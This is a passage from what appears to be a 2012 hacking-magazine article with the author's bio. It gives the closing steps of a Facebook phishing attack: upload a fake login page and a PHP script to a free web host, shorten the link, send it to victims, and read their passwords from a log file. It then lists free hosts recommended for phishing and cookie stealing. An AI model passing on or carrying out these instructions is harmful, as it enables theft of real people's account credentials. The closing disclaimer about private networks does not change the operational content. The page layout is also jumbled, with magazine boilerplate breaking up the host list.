NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY! 6. Your page is ready for uploading. 7. Create an account on free webhosting sites just like (WWW.MY3GB.COM) or (WWW.5GB.COM)

Figure 23: Create an account on webhosting site like www.my3gb.com.

01/2012 35

Upload your phishing page on your webhosting page. You should receive something like that:

Figure 24: Upload fake page and php script on webhosting site.

AFTER UPLOADING IT Now shorten the URL of the INDEX.HTML (NAME.MY3GB.COM/INDEX.HTML) in Google URL for everytime. Next send the link (GOO.GL____) to victim make your victim to login or send your fake URL of FB login to your victim e-mail. Once your victim is logged in your fake page JUST RECIEVE PASSWORD IN LOG.TXT

Here are some suggested free web hosting websites For phishing, cookie stealing and other hacking purposes you need a help from the web hosting sites. These address will help you a lot. Choose your favorite one and sign up, all of them are for free. 1. 110mb - http://110mb.com 2. Ripway - http://ripway.com 3. SuperFreeHost - http://superfreehost.info 4. Freehostia - http://freehostia.com 5. Freeweb7 - http://freeweb7.com 6. t35 - http://t35.com 7. Awardspace - http://awardspace.com 8. PHPNet - http://phpnet.us

Figure 25: Credential hacking.


9. Free Web Hosting Pro http://freewebhostingpro.com 10. ProHosts - http://prohosts.org 11. FreeZoka - http://www.freezoka.com/

Thank you for reading our magazine from cover to cover. Please share with us your comment about this issue on Twitter:

12. 000webhost - http://000webhost.com/ 13. AtSpace - http://atspace.com 14. My3gb - http://my3gb.com 15. Zymic - http://zymic.com

About the author VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his Group “hackers4u” on Facebook in year 2010 and in two years he bangs the World Wide Web with good computer ethical hacking articles and going to launch the website on Cyber Security & Ethical Hacking and working with a Anti-Hacking Community “Ihackers4u”. The 22 year old guy have the capability to compete with the people best in the business so called” Ethical Hacking”. Workshops and Seminars: VIKAS KUMAR have trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Shri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Omen, Yemen, Indonesia, Korea, Iran and etc.

@Hackinsight or Facebook:

http://www.facebook.com /hackinsight

Become our Beta Tester and receive each article before publication date!

[email protected]

The techniques described in our articles may only be used in private, local networks.The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

01/2012 37

Different Ways of hacking passwords

Recommend Documents